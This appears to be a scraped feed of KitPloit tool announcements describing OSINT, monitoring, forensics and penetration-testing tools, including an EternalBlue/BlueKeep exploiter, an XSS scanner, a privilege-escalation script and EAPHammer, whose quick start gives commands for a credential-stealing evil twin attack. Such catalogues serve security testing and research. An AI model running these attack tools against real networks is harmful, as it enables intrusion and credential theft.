Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

Maryam - Open-source intelligence (OSINT) Framework

$
0
0

Maryam is a full-featured open-source intelligence(OSINT) framework written in Python. Complete with independent modules, built in functions, interactive help, and command completion, provides a command-line environment for used forensic and open-source intelligence(OSINT).
Maryam is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the "module" class.The "module" class is a customized "cmd" interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, and making web requests. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes. See the Development Guide for guide information.

What can be done
Can extract
  • Comments, Links, CDNs, CSS, JS files..
  • Documentations(pdf, doc, ..)
  • Keywords, errors, usernames, ..
  • DNS, TLD and bruteforce it.
  • SiteMap
Can identify
  • Interesting and important files
  • Emails from search engines
  • Onion related links
  • Subdomains from different sources
  • WebApps, WAF,..
  • Social networks
  • ..

links

OWASP

Wiki

Modules Guide



Zeek - A Powerful Network Analysis Framework That Is Much Different From The Typical IDS You May Know

$
0
0

A powerful framework for network traffic analysis and security monitoring.
Key FeaturesDocumentationGetting StartedDevelopmentLicense
Follow us on Twitter at @zeekurity.

Key Features
  • In-depth Analysis Zeek ships with analyzers for many protocols, enabling high-level semantic analysis at the application layer.
  • Adaptable and Flexible Zeek's domain-specific scripting language enables site-specific monitoring policies and means that it is not restricted to any particular detection approach.
  • Efficient Zeek targets high-performance networks and is used operationally at a variety of large sites.
  • Highly Stateful Zeek keeps extensive application-layer state about the network it monitors and provides a high-level archive of a network's activity.

Getting Started
The best place to find information about getting started with Zeek is our web site www.zeek.org, specifically the documentation section there. On the web site you can also find downloads for stable releases, tutorials on getting Zeek set up, and many other useful resources.
You can find release notes in NEWS, and a complete record of all changes in CHANGES.
To work with the most recent code from the development branch of Zeek, clone the master git repository:
git clone --recursive https://github.com/zeek/zeek
With all dependencies in place, build and install:
./configure && make && sudo make install
Write your first Zeek script:
# File "hello.zeek"

event zeek_init()
{
print "Hello World!";
}
And run it:
zeek hello.zeek
For learning more about the Zeek scripting language, try.zeek.org is a great resource.

Development
Zeek is developed on GitHub by its community. We welcome contributions. Working on an open source project like Zeek can be an incredibly rewarding experience and, packet by packet, makes the Internet a little safer. Today, as a result of countless contributions, Zeek is used operationally around the world by major companies and educational and scientific institutions alike for securing their cyber infrastructure.
If you're interested in getting involved, we collect feature requests and issues on GitHub here and you might find these to be a good place to get started. More information on Zeek's development can be found here, and information about its community and mailing lists (which are fairly active) can be found here.


Ispy - Eternalblue (MS17-010) / Bluekeep (CVE-2019-0708) Scanner And Exploit

$
0
0

ispy : Eternalblue(ms17-010)/Bluekeep(CVE-2019-0708) Scanner and exploiter ( Metasploitautomation )

How to install :
git clone https://github.com/Cyb0r9/ispy.git
cd ispy
chmod +x setup.sh
./setup.sh

Screenshots :






Tested On :
  • Parrot OS
  • Kali linux

Tutorial ( How to use ispy )


info

Disclaimer :

usage of ispy for attacking targets without prior mutual consent is illegal.
ispy is for security testing purposes only


MalConfScan - Volatility Plugin For Extracts Configuration Data Of Known Malware

$
0
0


MalConfScan is a Volatility plugin extracts configuration data of known malware. Volatility is an open-source memory forensics framework for incident response and malware analysis. This tool searches for malware in memory images and dumps configuration data. In addition, this tool has a function to list strings to which malicious code refers.

Supported Malware Families
MalConfScan can dump the following malware configuration data, decoded strings or DGA domains:
  • Ursnif
  • Emotet
  • Smoke Loader
  • PoisonIvy
  • CobaltStrike
  • NetWire
  • PlugX
  • RedLeaves / Himawari / Lavender / Armadill / zark20rk
  • TSCookie
  • TSC_Loader
  • xxmm
  • Datper
  • Ramnit
  • HawkEye
  • Lokibot
  • Bebloh (Shiotob/URLZone)
  • AZORult
  • NanoCore RAT
  • AgentTesla
  • FormBook
  • NodeRAT (https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html)
  • njRAT
  • TrickBot
  • Remcos
  • QuasarRAT
  • Pony

Additional Analysis
MalConfScan has a function to list strings to which malicious code refers. Configuration data is usually encoded by malware. Malware writes decoded configuration data to memory, it may be in memory. This feature may list decoded configuration data.

How to Install
If you want to know more details, please check the MalConfScan wiki.

How to Use
MalConfScan has two functions malconfscan and malstrscan.

Export known malware configuration
$ python vol.py malconfscan -f images.mem --profile=Win7SP1x64

List the referenced strings
$ python vol.py malstrscan -f images.mem --profile=Win7SP1x64

MalConfScan with Cuckoo
Malware configuration data can be dumped automatically by adding MalConfScan to Cuckoo Sandbox. If you need more details on Cuckoo and MalConfScan integration, please check MalConfScan with Cuckoo.


Mosca - Manual Search Tool To Find Bugs Like A Grep Unix Command

$
0
0


Mosca

Manual analysis tool to find bugs like a grepunix command, Version 0.05
because is not dynamic... uses static code to search... don't confuse with academic views hahaha don't have graph here or CFG... is a simple "grep"
*egg modules is a config to find to vulnerabilities
*you can use at C, PHP, javascript, ruby etc
*Save results at XML file
*create your own modules etc...
*why static ?


DECAF - Short for Dynamic Executable Code Analysis Framework

$
0
0
DECAF++, the new version of DECAF, taint analysis is around 2X faster making it the fastest, to the best of our knowledge, whole-system dynamic taint analysis framework. This results in a much better usability imposing only 4% overhead (SPEC CPU2006) when no suspicious (tainted) input exists. Even under heavy taint analysis workloads, DECAF++ has a much better performance, around 25% faster on nbench, because of its elasticity. DECAF++ elasticity makes it a very suitable case for security analysis tasks that would selectively analyze the input e.g. Intrusion Detection Systems (IDS) that can filter out benign traffic. For further technical details, see our RAID 2019 paper. To activate the optimizations.



PUBLICATIONS
  1. Ali Davanian, Zhenxiao Qi, Yu Qu, and Heng Yin, DECAF++: Elastic Whole-System Dynamic Taint Analysis, In the 22nd International Symposium on Research in Attacks, Intrusions and Defenses (RAID), September 2019. (If you wish to cite the new optimized version of DECAF, please cite this paper)
  2. "Make it work, make it right, make it fast: building a platform-neutral whole-system dynamic binary analysis platform", Andrew Henderson, Aravind Prakash, Lok Kwong Yan, Xunchao Hu, Xujiewen Wang, Rundong Zhou, and Heng Yin, to appear in the International Symposium on Software Testing and Analysis (ISSTA'14), San Jose, CA, July 2014.(If you wish to cite DECAF, please cite this paper)
  3. Lok Kwong Yan, Andrew Henderson, Xunchao Hu, Heng Yin, and Stephen McCamant?.On soundness and precision of dynamic taint analysis. Technical Report SYR-EECS-2014-04, Syracuse University, January 2014.
  4. DroidScope: Seamlessly Reconstructing OS and Dalvik Semantic Views for Dynamic Android Malware Analysis", Lok-Kwong Yan and Heng Yin, in the 21st USENIX Security Symposium, Bellevue, WA, August 8-10, 2012.

Introduction
DECAF (Dynamic Executable Code Analysis Framework) is the successor to the binary analysis techniques developed for TEMU (dynamic analysis component of BitBlaze ) as part of Heng Yin's work on BitBlaze project headed up by Dawn Song. DECAF builds upon TEMU. We appreciate all that worked with us on that project.


Fig 1 the overall architecture of DECAF
Fig 1 illustrates the overall architecture of DECAF. DECAF is a platform-agnostic whole-system dynamic binary analysis framework. It provides the following key features.

Right-on-Time Virtual Machine Introspection
Different with TEMU, DECAF doesn’t use guest driver to retrieve os-level semantics. The VMI component of DECAF is able to reconstruct a fresh OS-level view of the virtual machine, including processes, threads, code modules, and symbols to support binary analysis. Further, in order to support multiple architectures and operating systems, it follows as a platform-agnostic design. The workflow for extracting OS-level semantic information is common across multiple architectures and operating systems. The only platform- specific handling lies in what kernel data structures and what fields to extract information from.

Support for Multiple Platforms
Ideally, we would like to have the same analysis code (with minimum platform-specific code) to work for different CPU architectures (e.g, x86 and ARM) and different operating systems (e.g., Windows and Linux). It requires that the analysis framework hide the architecture and operating system specific details from the analysis plugins. Further, to make the analysis framework itself maintainable and extensible to new architectures and operat-ing systems, the platform-specific code within the framework should also be minimized. DECAF can provide support for both multiple architectures and multiple operating systems. Currently, DECAF supports 32 bit Windows xp/Windows 7/linux and X86/arm.

Precise and Lossless Tainting
DECAF ensures precise tainting by maintaining bit-level precision for CPU registers and memory, and inlining precise tainting rules in the translated code blocks. Thus, the taint status for each CPU register and memory location is processed and updated synchronously during the code execution of the virtual machine. The propagation of taint labels is done in an asynchronous manner . By implementing such a tainting logic mainly in the intermediate representation level (more concretely, TCG IR level), it becomes easy to extend tainting support to a new CPU architecture.

Event-driven programming interfaces
DECAF provides an event-driven programming interface. It means that the paradigm of ”instrument” in the translation phase and then analyze in the execution phase” is invisible to the analysis plugins. The analysis plugins only need to register for interested events and implement corresponding event handling functions. The details of code instrumentation are taken care of by the framework.

Dynamic instrumentation management
To reduce runtime overhead, the instrumentation code is inserted into the translated code only when necessary. For example, when a plugin registers a function hook at a function’s entry point, the instrumentation code for this hook is only placed at the function entry point. When the plugin unregisters this function hook, the instrumentation code will also be removed from the translated code accordingly. To ease the development of plugins, the management of dynamic code instrumentation is completely taken care of in the framework, and thus invisible to the plugins.

Help Documents
Please refer to our wiki page for help documents.


Traxss - Automated XSS Vulnerability Scanner

$
0
0

Automated Vulnerability Scanner for XSS | Written in Python3 | Utilizes Selenium Headless

Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests. View the gif above to see a preview of the fastest type of scan.

Getting Started

Prerequisites
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:
brew install cask chromedriver
Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads

Installation
Run the command:
pip3 install -r requirements.txt

Running Traxss
Traxx can be started with the command:
python3 traxss.py
This will launch an interactive CLI to guide you through the process.

Types of Scans

Full Scan w/ HTML
Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS Vulnerablities (this feature is still in beta).

Full Scan w/o HTML
This scan will run the query scan only.

Fast Scan w/ HTML
This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Fast Scan w/o HTML
This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.


Fsmon - Monitor Filesystem On iOS / OS X / Android / FirefoxOS / Linux

$
0
0

FileSystem Monitor utility that runs on Linux, Android, iOS and OSX.
Brought to you by Sergi Àlvarez at Nowsecure and distributed under the MIT license.
Contact: pancake@nowsecure.com

Usage
The tool retrieves file system events from a specific directory and shows them in colorful format or in JSON.
It is possible to filter the events happening from a specific program name or process id (PID).
Usage: ./fsmon [-jc] [-a sec] [-b dir] [-B name] [-p pid] [-P proc] [path]
-a [sec] stop monitoring after N seconds (alarm)
-b [dir] backup files to DIR folder (EXPERIMENTAL)
-B [name] specify an alternative backend
-c follow children of -p PID
-f show only filename (no path)
-h show this help
-j output in JSON format
-L list all filemonitor backends
-p [pid] only show events from this pid
-P [proc] events only from process name
-v show version
[path] only get events from this path

Backends
fsmon filesystem information is taken from different backends depending on the operating system and apis available.
This is the list of backends that can be listed with fsmon -L:
  • inotify (linux / android)
  • fanotify (linux > 2.6.36 / android 5)
  • devfsev (osx /dev/fsevents - requires root)
  • kqueue (xnu - requires root)
  • kdebug (bsd?, xnu - requires root)
  • fsevapi (osx filesystem monitor api)

Compilation
fsmon is a portable tool. It works on iOS, OSX, Linux and Android (x86, arm, arm64, mips)
Linux
$ make
OSX + iOS fatbin
$ make
iOS
$ make ios
Android
$ make android NDK_ARCH=<ARCH> ANDROID_API=<API>
To get fsmon installed system wide just type:
$ make install
Changing installation path...
$ make install PREFIX=/usr DESTDIR=/



Tylium - Primary Data Pipelines For Intrusion Detection, Security Analytics And Threat Hunting

$
0
0

These files contain configuration for producing EDR (endpoint detection and response) data in addition to standard system logs. These configurations enable the production of these data streams using F/OSS (free and / or open source tooling.) The F/OSS tools consist of Auditd for Linux; Sysmon for Windows and Xnumon for the Mac. Also included is a set of notes for configuring Suricata events and rules.
These data sets enumerate and / or generate the kinds of security relevant events that are required by threat hunting techniques and a wide variety of security analytics.
Tylium is part of the SpaceCake project for doing multi-platform intrusion detection, security analytics and threat hunting using open source tools for Linux and Windows in both cloud and conventional environments.

Contents:

Linux
auditd.yaml - a set of auditd rules for generating file, network and process events via the auditd susbsystem for Linux
SystemLogs.md - a matrix of Linux native operating system and web server logs

MacOS
configuration.plist - a configuration for generating sysmon-like events using the xnumon project on the MacOS

Suricata
Notes on event and rule setup for Suricata in cloud vs. terrestrial environments

Windows
EventLogs.md - a matrix of select Windows event log messages and their locations
sysmon-config-base.xml - a sysmon configuration file for generating file, network, registry, network, process and WMI events using Sysmon for Windows


SMTPTester - Tool To Check Common Vulnerabilities In SMTP Servers

$
0
0


SMTPTester is a python3 tool to test SMTP server for 3 common vulnerabilities:
  • Spoofing - The ability to send a mail on behalf of an internal user
  • Relay - Using this SMTP server to send email to other address outside of the organization
  • user enumeration - using the SMTP VRFY command to check if specific username and\or email address exist within the organization.

How to use it
First, install the needed dependencies:
pip install -r requirments.txt
Second, run the tool with the needed flags:
python SMTPTester.py --tester [tester email] --targets [SMTP IP or file containing multiple IPs]

Options to consider
  • -i\--internal
    • testing only for mail spoofing
  • -e\--external
  • -v\--vrfy
    • only perform user enumeration the tool will perform both internal and external when no specific test type is specified, and will append the output to a log file on the same folder as the SMTPTester.py file.

Issues, bugs and other code-issues
Yeah, I know, this code isn't the best. I'm fine with it as I'm not a developer and this is part of my learning process. If there is an option to do some of it better, please, let me know.
Not how many, but where.
v0.1


uniFuzzer - A Fuzzing Tool For Closed-Source Binaries Based On Unicorn And LibFuzzer

$
0
0
uniFuzzer is a fuzzing tool for closed-source binaries based on Unicorn and LibFuzzer. Currently it supports fuzzing 32-bits LSB ELF files on ARM/MIPS, which are usually seen in IoT devices.
中文介绍

Features
  • very little hack and easy to build
  • can target any specified function or code snippet
  • coverage-guided fuzzing with considerable speed
  • dependence resolved and loaded automatically
  • library function override by PRELOAD

Build
  1. Reverse the target binary and find interesting functions for fuzzing.
  2. Create a .c file in the directory callback, which should contain the following callbacks:
  • void onLibLoad(const char *libName, void *baseAddr, void *ucBaseAddr): It's invoked each time an dependent library is loaded in Unicorn.
  • int uniFuzzerInit(uc_engine *uc): It's invoked just after all the binaries been loaded in Unicorn. Stack/heap/registers can be setup up here.
  • int uniFuzzerBeforeExec(uc_engine *uc, const uint8_t *data, size_t len): It's invoked before each round of fuzzing execution.
  • int uniFuzzerAfterExec(uc_engine *uc): It's invoked after each round of fuzzing execution.
  1. Run make and get the fuzzing tool named uf.

Run
uniFuzzer uses the following environment variables as parameters:
  • UF_TARGET: Path of the target ELF file
  • UF_PRELOAD: Path of the preload library. Please make sure that the library has the same architecture as the target.
  • UF_LIBPATH: Paths in which the dependent libraries reside. Use : to separate multiple paths.
And the fuzzing can be started using the following command:
UF_TARGET=<target> [UF_PRELOAD=<preload>] UF_LIBPATH=<libPath> ./uf

Demo
There comes a demo for basic usage. The demo contains the following files:
  • demo-vuln.c: This is the target for fuzzing. It contains a simple function named vuln() which is vulnerable to stack/heap overflow.
  • demo-libcpreload.c: This is for PRELOAD hooking. It defines an empty printf() and simplified malloc()/free().
  • callback/demo-callback.c: This defines the necessary callbacks for fuzzing the demo vuln() function.
First, please install gcc for mipsel (package gcc-mipsel-linux-gnu on Debian) to build the demo:
# the target binary
# '-Xlinker --hash-style=sysv' tells gcc to use 'DT_HASH' instead of 'DT_GNU_HASH' for symbol lookup
# since currently uniFuzzer does not support 'DT_GNU_HASH'
mipsel-linux-gnu-gcc demo-vuln.c -Xlinker --hash-style=sysv -no-pie -o demo-vuln

# the preload library
mipsel-linux-gnu-gcc -shared -fPIC -nostdlib -Xlinker --hash-style=sysv demo-libcpreload.c -o demo-libcpreload.so
Or you can just use the file demo-vuln and demo-libcpreload.so, which are compiled using the commands above.
Next, run make to build uniFuzzer. Please note that if you compiled the MIPS demo by yourself, then some addresses might be different from the prebuilt one and demo-callback.c should be updated accordingly.
Finally, make sure that the libc library of MIPS is ready. On Debian it's in /usr/mipsel-linux-gnu/lib/ after installing the package libc6-mipsel-cross, and that's what UF_LIBPATH should be:
UF_TARGET=<path to demo-vuln> UF_PRELOAD=<path to demo-libcpreload.so> UF_LIBPATH=<lib path for MIPS> ./uf

Hack on Unicorn
Unicorn clears the JIT cache of QEMU due to this issue, which slows down the speed of fuzzing since the target binary would have to be JIT re-compiled during each round of execution.
We can comment out tb_flush(env); as stated in that issue for performance.


Unicorn-Bios - Basic BIOS Emulator For Unicorn Engine

$
0
0

Basic BIOS emulator/debugger for Unicorn Engine.
Written to debug the XEOS Operating System boot sequence.

Usage:
Usage: unicorn-bios [OPTIONS] BOOT_IMG

Options:

--help / -h: Displays help.
--memory / -m: The amount of memory to allocate for the virtual machine
(in megabytes). Defaults to 64MB, minimum 2MB.
--break / -b Breaks on a specific address.
--break-int: Breaks on interrupt calls.
--break-iret: Breaks on interrupt returns.
--trap: Raises a trap when breaking.
--debug-video: Turns on debug output for video services.
--single-step: Breaks on every instruction.
--no-ui: Don't start the user interface (output will be displayed to stdout, debug info to stderr).
--no-colors: Don't use colors.

Installation:
brew install --HEAD macmade/tap/unicorn-bios

Repository Infos
Owner:          Jean-David Gadina - XS-Labs
Web: www.xs-labs.com
Blog: www.noxeos.com
Twitter: @macmade
GitHub: github.com/macmade
LinkedIn: ch.linkedin.com/in/macmade/
StackOverflow: stackoverflow.com/users/182676/macmade


Postenum - A Clean, Nice And Easy Tool For Basic/Advanced Privilege Escalation Techniques

$
0
0

Postenum is a clean, nice and easy tool for basic/advanced privilege escalation vectors/techniques. Postenum tool is intended to be executed locally on a Linux box.
Be more than a normal user. be the ROOT.

USE
./postenum.sh [option]
./postenum.sh -s
./postenum.sh -c

Options :
-a : All
-s : Filesystem [SUID, SGID, Config/DB files, etc.]
-l : Shell escape and development tools
-c : The most interesting files
-n : Network settings
-p : Services and cron jobs
-o : OS informations and kernel exploits
-v : Software's versions
-t : Fstab credentials and databases checker

Install.sh
You can use install.sh script to install postenum. (only for system/network admins). to run it:
./install.sh

Version 0.8


Eaphammer v1.9.0 - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks

$
0
0

by Gabriel Ryan (s0lst1c3)(gryan[at]specterops.io)

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is, our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands.

Quick Start Guide (Kali)
Begin by cloning the eaphammer repo using the following command:
git clone https://github.com/s0lst1c3/eaphammer.git
Next run the kali-setup file as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:
./kali-setup
To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:
# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Usage and Setup Instructions
For complete usage and setup instructions, please refer to the project's wiki page:

Features
  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process
  • Leverages latest version of hostapd (2.8)
  • Support for evil twin and karma attacks
  • Generate timed Powershell payloads for indirect wireless pivots
  • Integrated HTTP server for Hostile Portal attacks
  • Support for SSID cloaking
  • Fast and automated PMKID attacks against PSK networks using hcxtools
  • Password spraying across multiple usernames against a single ESSID

New (as of Version 1.7.0)(latest):
EAPHammer now supports WPA/2-PSK along with WPA handshake captures.

OWE (added as of Version 1.5.0):
EAPHammer now supports rogue AP attacks against OWE and OWE-Transition mode networks.

PMF (added as of Version 1.4.0)
EAPHammer now supports 802.11w (Protected Management Frames), Loud Karma attacks, and Known Beacon attacks (documentation coming soon).

GTC Downgrade Attacks
EAPHammer will now automatically attempt a GTC Downgrade attack against connected clients in an attempt to capture plaintext credentials (see: https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s).

Improved Certificate Handling
EAPHammer's Cert Wizard has been expanded to provide users with the ability to create, import, and manage SSL certificates in a highly flexible manner. Cert Wizard's previous functionality has been preserved as Cert Wizard's Interactive Mode, which uses the same syntax as previous versions. See XIII - Cert Wizard for additional details.

TLS / SSL Backwards Compatibility
EAPHammer now uses a local build of libssl that exists independently of the systemwide install. This local version is compiled with support for SSLv3, allowing EAPHammer to be used against legacy clients without compromising the integrity of the attacker's operating system.

Supported EAP Methods
EAPHammer supports the following EAP methods:
  • EAP-PEAP/MSCHAPv2
  • EAP-PEAP/GTC
  • EAP-PEAP/MD5
  • EAP-TTLS/PAP
  • EAP-TTLS/MSCHAP
  • EAP-TTLS/MSCHAPv2
  • EAP-TTLS/MSCHAPv2 (no EAP)
  • EAP-TTLS/CHAP
  • EAP-TTLS/MD5
  • EAP-TTLS/GTC
  • EAP-MD5

802.11a and 802.11n Support
EAPHammer now supports attacks against 802.11a and 802.11n networks. This includes the ability to create access points that support the following features:
  • Both 2.4 GHz and 5 GHz channel support
  • Full MIMO support (multiple input, multiple output)
  • Frame aggregation
  • Support for 40 MHz channel widths using channel bonding
  • High Throughput Mode
  • Short Guard Interval (Short GI)
  • Modulation & coding scheme (MCS)
  • RIFS
  • HT power management

Upcoming Features
  • Perform seamless MITM attacks with partial HSTS bypasses
  • directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)
  • Integrated website cloner for cloning captive portal login pages
  • Integrated HTTP server for captive portals

Contributing
Contributions are encouraged and more than welcome. Please attempt to adhere to the provided issue and feature request templates.

Versioning
We use SemVer for versioning (or at least make an effort to). For the versions available, see https://github.com/s0lst1c3/eaphammer/releases.

License
This project is licensed under the GNU Public License 3.0 - see the LICENSE.md file for details.

Acknowledgments
This tool either builds upon, is inspired by, or directly incorporates nearly fifteen years of prior research and development from the following awesome people:
  • Brad Antoniewicz
  • Joshua Wright
  • Robin Wood
  • Dino Dai Zovi
  • Shane Macauly
  • Domanic White
  • Ian de Villiers
  • Michael Kruger
  • Moxie Marlinspike
  • David Hulton
  • Josh Hoover
  • James Snodgrass
  • Adam Toscher
  • George Chatzisofroniou
  • Mathy Vanhoef
For a complete description of what each of these people has contributed to the current wireless security landscape and this tool, please see:
EAPHammer leverages a modified version of hostapd-wpe (shoutout to Brad Anton for creating the original), dnsmasq, asleap, hcxpcaptool and hcxdumptool for PMKID attacks, Responder, and Python 3.5+.
Finally, huge shoutout to the SpecterOps crew for supporting this project and being a constant source of inspiration.


RITA - Real Intelligence Threat Analytics

$
0
0

RITA is an open source framework for network traffic analysis.
The framework ingests Bro/Zeek Logs in TSV format, and currently supports the following major features:
  • Beaconing Detection: Search for signs of beaconing behavior in and out of your network
  • DNS Tunneling Detection Search for signs of DNS based covert channels
  • Blacklist Checking: Query blacklists to search for suspicious domains and hosts

Automatic Installation
The automatic installer is officially supported on Ubuntu 16.04 LTS, Security Onion*, and CentOS 7
  • Download the latest install.sh file from the release page
  • Make the installer executable: chmod +x ./install.sh
  • Run the installer: sudo ./install.sh
* Please see the Security Onion RITA wiki page for further information pertaining to using RITA on Security Onion.

Manual Installation
To install each component of RITA by hand, check out the instructions in the docs.

Upgrading RITA
See this guide for upgrade instructions.

Getting Started

System Requirements
  • Operating System - The preferred platform is 64-bit Ubuntu 16.04 LTS. The system should be patched and up to date using apt-get.
  • Processor (when installed alongside Bro/Zeek) - Two cores plus an additional core for every 100 Mb of traffic being captured. (three cores minimum). This should be dedicated hardware, as resource congestion with other VMs can cause packets to be dropped or missed.
  • Memory - 16GB minimum. 64GB if monitoring 100Mb or more of network traffic. 128GB if monitoring 1Gb or more of network traffic.
  • Storage - 300GB minimum. 1TB or more is recommended to reduce log maintenance.
  • Network - In order to capture traffic with Bro/Zeek, you will need at least 2 network interface cards (NICs). One will be for management of the system and the other will be the dedicated capture port. Intel NICs perform well and are recommended.

Configuration File
RITA's config file is located at /etc/rita/config.yaml though you can specify a custom path on individual commands with the -ccommand line flag.
❗️IMPORTANT❗️
  • The Filtering: InternalSubnets section must be configured or you will not see any results in certain modules (e.g. beacons, long connections). If your network uses the standard RFC1918 internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) you just need uncomment the default InternalSubnets section already in the config file. Otherwise, adjust this section to match your environment. RITA's main purpose is to find the signs of a compromised internal system talking to an external system and will automatically exclude internal to internal connections and external to external connections from parts of the analysis.
You may also wish to change the defaults for the following option:
  • Filtering: AlwaysInclude - Ranges listed here are exempt from the filtering applied by the InternalSubnets setting. The main use for this is to include internal DNS servers so that you can see the source of any DNS queries made.
Note that any value listed in the Filtering section should be in CIDR format. So a single IP of 192.168.1.1 would be written as 192.168.1.1/32.

Obtaining Data (Generating Bro/Zeek Logs):
  • Option 1: Generate PCAPs outside of Bro/Zeek
    • Generate PCAP files with a packet sniffer (tcpdump, wireshark, etc.)
    • (Optional) Merge multiple PCAP files into one PCAP file
      • mergecap -w outFile.pcap inFile1.pcap inFile2.pcap
    • Generate Bro/Zeek logs from the PCAP files
      • bro -r pcap_to_log.pcap local "Log::default_rotation_interval = 1 day"
  • Option 2: Install Bro/Zeek and let it monitor an interface directly [instructions]
    • You may wish to compile Bro/Zeek from source for performance reasons. This script can help automate the process.
    • The automated installer for RITA installs pre-compiled Bro/Zeek binaries by default
      • Provide the --disable-bro flag when running the installer if you intend to compile Bro/Zeek from source

Importing and Analyzing Data With RITA
After installing RITA, setting up the InternalSubnets section of the config file, and collecting some Bro/Zeek logs, you are ready to begin hunting.
Filtering and whitelisting happens at import time. These optional settings can be found alongside InternalSubnets in the configuration file.
RITA will process Bro/Zeek TSV logs in both plaintext and gzip compressed formats. Note, if you are using Security Onion or Bro's JSON log output you will need to switch back to traditional TSV output.
  • Option 1: Create a One-Off Dataset
    • rita import path/to/your/bro_logs dataset_name creates a dataset from a collection of Bro/Zeek logs in a directory
    • Every log file directly in the supplied directory will be imported into a dataset with the given name
    • If you import more data into the same dataset, RITA will automatically convert it into a rolling dataset.
  • Option 2: Create a Rolling Dataset
    • Rolling datasets allow you to progressively analyze log data over a period of time as it comes in.
    • You can call rita like this: rita import --rolling /path/to/your/bro_logs and make this call repeatedly as new logs are generated (e.g. every hour)
    • RITA cycles data into and out of rolling databases in "chunks". You can think of each chunk as one hour, and the default being 24 chunks in a dataset. This gives the ability to always have the most recent 24 hours' worth of data available. But chunks are generic enough to accommodate non-default Bro logging configurations or data retention times as well.

Rolling Datsets
Please see the above section for the simplest use case of rolling datasets. This section covers the various options you can customize and more complicated use cases.
Each rolling dataset has a total number of chunks it can hold before it rotates data out. For instance, if the dataset currently contains 24 chunks of data and is set to hold a max of 24 chunks then the next chunk to be imported will automatically remove the first chunk before brining the new data in. This will result in a database that still contains 24 chunks. If each chunk contains an hour of data your dataset will have 24 hours of data in it. You can specify the number of chunks manually with --numchunks when creating a rolling database but if this is omitted RITA will use the Rolling: DefaultChunks value from the config file.
Likewise, when importing a new chunk you can specify a chunk number that you wish to replace in a dataset with --chunk. If you leave this off RITA will auto-increment the chunk for you. The chunk must be 0 (inclusive) through the total number of chunks (exclusive). This must be between 0 (inclusive) and the total number of chunks (exclusive). You will get an error if you try to use a chunk number greater or equal to the total number of chunks.
All files and folders that you give RITA to import will be imported into a single chunk. This could be 1 hour, 2 hours, 10 hours, 24 hours, or more. RITA doesn't care how much data is in each chunk so even though it's normal for each chunk to represent the same amount of time, each chunk could have a different number of hours of logs. This means that you can run RITA on a regular interval without worrying if systems were offline for a little while or the data was delayed. You might get a little more or less data than you intended but as time passes and new data is added it will slowly correct itself.
Example: If you wanted to have a dataset with a week's worth of data you could run the following rita command once per day.
rita import --rolling --numchunks 7 /opt/bro/logs/current week-dataset
This would import a day's worth of data into each chunk and you'd get a week's in total. After the first 7 days were imported, the dataset would rotate out old data to keep the most recent 7 days' worth of data. Note that you'd have to make sure new logs were being added to in /opt/bro/logs/current in this example.
Example: If you wanted to have a dataset with 48 hours of data you could run the following rita command every hour.
rita import --rolling --numchunks 48 /opt/bro/logs/current 48-hour-dataset

Examining Data With RITA
  • Use the show-X commands
    • show-databases: Print the datasets currently stored
    • show-beacons: Print hosts which show signs of C2 software
    • show-bl-hostnames: Print blacklisted hostnames which received connections
    • show-bl-source-ips: Print blacklisted IPs which initiated connections
    • show-bl-dest-ips: Print blacklisted IPs which received connections
    • show-exploded-dns: Print dns analysis. Exposes covert dns channels
    • show-long-connections: Print long connections and relevant information
    • show-strobes: Print connections which occurred with excessive frequency
    • show-useragents: Print user agent information
  • By default RITA displays data in CSV format
    • -H displays the data in a human readable format
    • Piping the human readable results through less -S prevents word wrapping
      • Ex: rita show-beacons dataset_name -H | less -S
  • Create a html report with html-report



Gobuster v3.0 - Directory/File, DNS And VHost Busting Tool Written In Go

$
0
0

Gobuster is a tool used to brute-force:
  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).
  • Virtual Host names on target web servers.

Oh dear God.. WHY!?
Because I wanted:
  1. ... something that didn't have a fat Java GUI (console FTW).
  2. ... to build something that just worked on the command line.
  3. ... something that did not do recursive brute force.
  4. ... something that allowed me to brute force folders and multiple extensions at once.
  5. ... something that compiled to native on multiple platforms.
  6. ... something that was faster than an interpreted script (such as Python).
  7. ... something that didn't require a runtime.
  8. ... use something that was good with concurrency (hence Go).
  9. ... to build something in Go that wasn't totally useless.

But it's shit! And your implementation sucks!
Yes, you're probably correct. Feel free to:
  • Not use it.
  • Show me how to do it better.

Love this tool? Back it!
If you're backing us already, you rock. If you're not, that's cool too! Want to back us? Become a backer!

All funds that are donated to this project will be donated to charity. A full log of charity donations will be available in this repository as they are processed.

Changes in 3.0
  • New CLI options so modes are strictly seperated (-m is now gone!)
  • Performance Optimizations and better connection handling
  • Ability to bruteforce vhost names
  • Option to supply custom HTTP headers

Available Modes
  • dir - the classic directory brute-forcing mode
